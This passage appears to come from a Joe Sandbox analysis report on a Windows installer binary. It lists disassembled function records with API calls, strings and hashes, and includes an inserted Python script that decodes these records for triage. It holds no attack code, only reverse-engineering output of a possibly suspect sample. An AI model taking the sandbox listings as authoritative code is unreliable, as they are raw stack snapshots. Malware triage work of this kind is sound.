                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                          • String ID: CreateEvent$TransactNamedPipe
                                                                          • API String ID: 2182916169-3012584893
                                                                          • Opcode ID: 38f21b6de1c3782b685d2c0af9f28be416f44e06874f6bb5035634e2dcc68750
                                                                          • Instruction ID: 6afc82d78c4e6d9526045151df1525e73fa02dd6a17213aad7cd5d98e3565ae3
                                                                          • Opcode Fuzzy Hash: 38f21b6de1c3782b685d2c0af9f28be416f44e06874f6bb5035634e2dcc68750
                                                                          • Instruction Fuzzy Hash: BC418F70A04608AFDB15DFA5DD81FAEB7F9EB08710F1040B6F904E7392D6789E44CA68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00454EE5,?,?,00000031,?), ref: 00454DA8
                                                                          • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00454DAE
                                                                          • LoadTypeLib.OLEAUT32(00000000,?), ref: 00454DFB
                                                                            • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                          • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                          • API String ID: 1914119943-2711329623
                                                                          • Opcode ID: 10a434107409ef4988e99fdf2a40fccf44bc0ac8e46ad230c6e42fc229f0afa3
                                                                          • Instruction ID: 2bf04720efcd21e73fda0c956b895e5846be94a4420347b52386e37effde86e0
                                                                          • Opcode Fuzzy Hash: 10a434107409ef4988e99fdf2a40fccf44bc0ac8e46ad230c6e42fc229f0afa3
                                                                          • Instruction Fuzzy Hash: 1F319271A00604AFC701EFAACC52D5BB7BEFBC87097118466FD04DB652DA38DD44C628
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E379,?,?,00000001,00000000,?,?,00000001,00000000,00000002,00000000,0047B8F6), ref: 0042E29D
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E2A3
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E379,?,?,00000001,00000000,?,?,00000001), ref: 0042E2F1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressCloseHandleModuleProc
                                                                          • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                          • API String ID: 4190037839-2401316094
                                                                          • Opcode ID: d045098ef34200c22202e99a4145b28dd45ddec826700b532d9b98b58edb8012
                                                                          • Instruction ID: 4ee60a07781906a8a0ffae9c6e5e5ebe2969662c9c3675aa1be84450fad3e8b0
                                                                          • Opcode Fuzzy Hash: d045098ef34200c22202e99a4145b28dd45ddec826700b532d9b98b58edb8012
                                                                          • Instruction Fuzzy Hash: 87214630B00215EBDB00EAA7DC51B9F77A9EB04315FD04477A900E7281DB7CAE05DB58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RectVisible.GDI32(?,?), ref: 00416D83
                                                                          • SaveDC.GDI32(?), ref: 00416D97
                                                                          • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416DBA
                                                                          • RestoreDC.GDI32(?,?), ref: 00416DD5
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00416E55
                                                                          • FrameRect.USER32(?,?,?), ref: 00416E88
                                                                          • DeleteObject.GDI32(?), ref: 00416E92
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00416EA2
                                                                          • FrameRect.USER32(?,?,?), ref: 00416ED5
                                                                          • DeleteObject.GDI32(?), ref: 00416EDF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                          • String ID:
                                                                          • API String ID: 375863564-0
                                                                          • Opcode ID: 1df63080f967596adf43ebdb9d67fdccf49ab23e9096a25037667f73de04663f
                                                                          • Instruction ID: 01d81588b69ff1f480347e903aed9c185fc6c29f227380d1fa6610f1b9ad60dd
                                                                          • Opcode Fuzzy Hash: 1df63080f967596adf43ebdb9d67fdccf49ab23e9096a25037667f73de04663f
                                                                          • Instruction Fuzzy Hash: A8513C712086449BDB50EF69C8C0B9B77E8EF48314F15566AFD48CB286C738EC81CB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                          • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                          • String ID:
                                                                          • API String ID: 1694776339-0
                                                                          • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                          • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                          • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                          • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

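The "APIs" lines in the function records above are a stack snapshot printed as eight-digit hex words, which is hard to triage by eye: `CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,...)` means GENERIC_READ|GENERIC_WRITE with CREATE_ALWAYS and FILE_ATTRIBUTE_NORMAL, and the names handed to `GetProcAddress` (MonitorFromWindow, GetMonitorInfoA, GetUserDefaultUILanguage) are the run-time-resolved imports that do not appear in the import table. The following Python is an added example, not code from the report or from Joe Sandbox: it parses lines in the report's format, decodes the seven real CreateFile parameters, and lists the GetProcAddress targets. The sample lines are copied from the records on this page; the function and field names (`ApiCall`, `decode_create_file`, `dynamic_imports`, `summarize`) are my own.

```python
"""Parse the 'APIs' lines of Joe Sandbox function records and decode
a few argument fields into a triage-friendly form."""
import re
from dataclasses import dataclass
from typing import List, Optional

# One "APIs" line, e.g.
#   • CreateFileA.KERNEL32(00000000,C0000000,...), ref: 0045232F
#   • Part of subcall function 00452240: CloseHandle.KERNEL32(...), ref: 0045233F
#   • GetActiveWindow.USER32 ref: 0042EA88
_API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z0-9_@]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# The report prints stack words as exactly eight hex digits, optionally negated;
# anything else (".tmp", "STATIC", "?") is a string argument or an unknown value.
_HEX = re.compile(r"^(-?)([0-9A-Fa-f]{8})$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # raw tokens as printed
    ref: int                 # address of the call instruction
    subcall: Optional[int]   # callee address when listed as "Part of subcall function"


def as_int(tok: str) -> Optional[int]:
    m = _HEX.match(tok)
    if not m:
        return None
    return -int(m.group(2), 16) if m.group(1) else int(m.group(2), 16)


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["api"], m["module"].upper(), args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls


# Win32 constants for CreateFile's dwDesiredAccess, dwShareMode,
# dwCreationDisposition and dwFlagsAndAttributes (winnt.h / fileapi.h).
_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
_SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
_ATTRS = {0x2: "FILE_ATTRIBUTE_HIDDEN", 0x4: "FILE_ATTRIBUTE_SYSTEM",
          0x80: "FILE_ATTRIBUTE_NORMAL", 0x100: "FILE_ATTRIBUTE_TEMPORARY",
          0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x40000000: "FILE_FLAG_OVERLAPPED",
          0x80000000: "FILE_FLAG_WRITE_THROUGH"}


def _bits(value: Optional[int], table: dict) -> str:
    if value is None:
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else "0"


def decode_create_file(call: ApiCall) -> Optional[dict]:
    """Decode a CreateFileA/W call. The report lists the seven parameters first and
    then further stack slots, so only args[0:7] are parameters."""
    if not call.api.startswith("CreateFile") or len(call.args) < 7:
        return None
    disp = as_int(call.args[4])
    return {
        "ref": f"{call.ref:08X}",
        "access": _bits(as_int(call.args[1]), _ACCESS),
        "share": _bits(as_int(call.args[2]), _SHARE),
        "disposition": _DISPOSITION.get(disp, "?" if disp is None else hex(disp)),
        "attributes": _bits(as_int(call.args[5]), _ATTRS),
    }


def dynamic_imports(calls: List[ApiCall]) -> List[tuple]:
    """Names passed as GetProcAddress's second parameter: imports resolved at
    run time rather than through the PE import table."""
    return [(f"{c.ref:08X}", c.args[1]) for c in calls
            if c.api == "GetProcAddress" and len(c.args) >= 2 and as_int(c.args[1]) is None]


def summarize(text: str) -> dict:
    calls = parse_api_lines(text)
    return {
        "calls": len(calls),
        "create_file": [d for d in map(decode_create_file, calls) if d],
        "dynamic_imports": dynamic_imports(calls),
        "file_modifying": sorted({f"{c.ref:08X}" for c in calls
                                  if c.api in ("WriteFile", "CopyFileA", "CopyFileW",
                                               "WritePrivateProfileStringA",
                                               "SetFileAttributesA")}),
    }


# Lines copied from the function records in this report.
SAMPLE = """\
  • Part of subcall function 00452240: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,AI,_iu,?,00000000,0045237A), ref: 0045232F
• CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00490BED
• GetActiveWindow.USER32 ref: 0042EA88
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042EAA9
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042EAB6
• GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E379), ref: 0042E29D
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E2A3
• CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
"""

if __name__ == "__main__":
    import json
    print(json.dumps(summarize(SAMPLE), indent=2))
```

Two caveats when reading the output. The tokens are whatever was on the stack when the snapshot was taken, so a string can land in the wrong slot: in the record at 0042E29D the name `GetUserDefaultUILanguage` is printed among the extra slots of `GetModuleHandleA`, while `GetProcAddress` shows `kernel32.dll`; corroborate the decoded name against the record's "String ID" line before acting on it. And only the first N tokens are real parameters (seven for CreateFile, two for GetProcAddress); the rest are neighbouring stack words and must not be decoded as flags.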
                                                                          APIs
                                                                          • GetSystemMenu.USER32(00000000,00000000), ref: 004221A3
                                                                          • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 004221C1
                                                                          • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221CE
                                                                          • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221DB
                                                                          • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221E8
                                                                          • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 004221F5
                                                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422202
                                                                          • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042220F
                                                                          • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 0042222D
                                                                          • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 00422249
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Delete$EnableItem$System
                                                                          • String ID:
                                                                          • API String ID: 3985193851-0
                                                                          • Opcode ID: b8b89d1ef914de5f4b700308a8a2e79f02337078b5e803e02db0f43c2e7e4a28
                                                                          • Instruction ID: e98f5eede000e984507cfb68b46ad6efe0a5c83d9602cc3651cf502f29ecaa29
                                                                          • Opcode Fuzzy Hash: b8b89d1ef914de5f4b700308a8a2e79f02337078b5e803e02db0f43c2e7e4a28
                                                                          • Instruction Fuzzy Hash: 23213370380744BAE720D725DD8BF9B7BD89B04708F0444A5BA487F2D7C6F9AE40869C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(10000000), ref: 0047BFA8
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0047BFBC
                                                                          • SendNotifyMessageA.USER32(00020420,00000496,00002710,00000000), ref: 0047C021
                                                                          Strings
                                                                          • Not restarting Windows because Setup is being run from the debugger., xrefs: 0047BFDD
                                                                          • Deinitializing Setup., xrefs: 0047BE1E
                                                                          • GetCustomSetupExitCode, xrefs: 0047BE5D
                                                                          • Restarting Windows., xrefs: 0047BFFC
                                                                          • DeinitializeSetup, xrefs: 0047BEB9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary$MessageNotifySend
                                                                          • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                          • API String ID: 3817813901-1884538726
                                                                          • Opcode ID: 99f915d00c11ec276e19136852c787799f8d5699edd2cc415edbfead57b4d6dc
                                                                          • Instruction ID: 5aabc136c0a50bbda2486703200ad66b9283696e7d5460ba133d2cc504fcf864
                                                                          • Opcode Fuzzy Hash: 99f915d00c11ec276e19136852c787799f8d5699edd2cc415edbfead57b4d6dc
                                                                          • Instruction Fuzzy Hash: 2251BF30600A019FD712DB69E899B9A77A4EB59704F60C4BBF808C73A1DB789C45CF9D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00457770: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004578A2,00000000,004579EF,?,00000000,00000000,00000000), ref: 004577BD
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004579EF,?,00000000,00000000,00000000), ref: 004578FE
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004579EF,?,00000000,00000000,00000000), ref: 00457964
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          Strings
                                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00457918
                                                                          • v1.1.4322, xrefs: 00457956
                                                                          • .NET Framework version %s not found, xrefs: 0045799E
                                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 004578B2
                                                                          • .NET Framework not found, xrefs: 004579B2
                                                                          • v2.0.50727, xrefs: 004578F0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Close$Open
                                                                          • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$v1.1.4322$v2.0.50727
                                                                          • API String ID: 2976201327-1070292914
                                                                          • Opcode ID: 459b95da5429d7d35dab5d0c6b2d4d5a6c6ec011e70205ce483ffcd3ec2b4037
                                                                          • Instruction ID: c0ad98b253435a04450e4f0d412c4263007441af3f925dfe38269f217dae66aa
                                                                          • Opcode Fuzzy Hash: 459b95da5429d7d35dab5d0c6b2d4d5a6c6ec011e70205ce483ffcd3ec2b4037
                                                                          • Instruction Fuzzy Hash: 2741EC70A081465FDB00DFA5E851BDE77B5EB49305F54447BE400DB243D7799A0ECB68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SHGetMalloc.SHELL32(?), ref: 0045DC5B
                                                                          • GetActiveWindow.USER32 ref: 0045DCBF
                                                                          • CoInitialize.OLE32(00000000), ref: 0045DCD3
                                                                          • SHBrowseForFolder.SHELL32(?), ref: 0045DCEA
                                                                          • 756CD120.OLE32(0045DD2B,00000000,?,?,?,?,?,00000000,0045DDAF), ref: 0045DCFF
                                                                          • SetActiveWindow.USER32(?,0045DD2B,00000000,?,?,?,?,?,00000000,0045DDAF), ref: 0045DD15
                                                                          • SetActiveWindow.USER32(?,?,0045DD2B,00000000,?,?,?,?,?,00000000,0045DDAF), ref: 0045DD1E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ActiveWindow$BrowseD120FolderInitializeMalloc
                                                                          • String ID: A
                                                                          • API String ID: 2698730301-3554254475
                                                                          • Opcode ID: 35e8b70af3f9a11701dc89ad6a7dc5067c9e57c40fd942637c72eceddb9e2f2f
                                                                          • Instruction ID: cf29a6196fb2df87458bc734ae7ceebd32c59f4afd20480d407c1097e6e56ab9
                                                                          • Opcode Fuzzy Hash: 35e8b70af3f9a11701dc89ad6a7dc5067c9e57c40fd942637c72eceddb9e2f2f
                                                                          • Instruction Fuzzy Hash: E0311271D00208AFDB11EFB6D886A9EBBF8EF09304F51447AF804E7252D7785A44CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetSystemMetrics.USER32(0000000E), ref: 00418BE0
                                                                          • GetSystemMetrics.USER32(0000000D), ref: 00418BE8
                                                                          • 6F552980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418BEE
                                                                            • Part of subcall function 00409920: 6F54C400.COMCTL32((FI,000000FF,00000000,00418C1C,00000000,00418C78,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00409924
                                                                          • 6F5BCB00.COMCTL32((FI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C3E
                                                                          • 6F5BC740.COMCTL32(00000000,?,(FI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418C49
                                                                          • 6F5BCB00.COMCTL32((FI,00000001,?,?,00000000,?,(FI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000), ref: 00418C5C
                                                                          • 6F550860.COMCTL32((FI,00418C7F,?,00000000,?,(FI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000,0000000E), ref: 00418C72
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: MetricsSystem$C400C740F550860F552980
                                                                          • String ID: (FI
                                                                          • API String ID: 1828538299-1614602237
                                                                          • Opcode ID: a62bb13e1bd7fa3b9c7351fff79d2a2ecdea0cb757dbaccc16c00855b604fece
                                                                          • Instruction ID: 8ee50baf9f6b03e6802097753a63af578849a2694d0e9ed51cb84c1dfac16794
                                                                          • Opcode Fuzzy Hash: a62bb13e1bd7fa3b9c7351fff79d2a2ecdea0cb757dbaccc16c00855b604fece
                                                                          • Instruction Fuzzy Hash: B51136B5744204BADB10EBF5DC82F5E73B8DB49704F50406AB604E72D2E6799D408768
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045B5E1
                                                                          • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045B5F1
                                                                          • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045B601
                                                                          • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045B611
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                          • API String ID: 190572456-3516654456
                                                                          • Opcode ID: 0244c5342f474d5f0d92f6c90a29f5f03fc9f5158d69ccc7f6593d0f4fc18990
                                                                          • Instruction ID: fd82cc1e756c275edc3707c7f07377cec179b09f743abcb6ba5c01fe1bd4d686
                                                                          • Opcode Fuzzy Hash: 0244c5342f474d5f0d92f6c90a29f5f03fc9f5158d69ccc7f6593d0f4fc18990
                                                                          • Instruction Fuzzy Hash: E5012CB0500746DEEB14DF72EC90B2736A5E7E870AF14803BA845562AADB7C044BCE5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0041A929
                                                                          • 73A24D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041A963
                                                                          • SetBkColor.GDI32(?,?), ref: 0041A978
                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041A9C2
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041A9CD
                                                                          • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041A9DD
                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AA1C
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041AA26
                                                                          • SetBkColor.GDI32(00000000,?), ref: 0041AA33
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
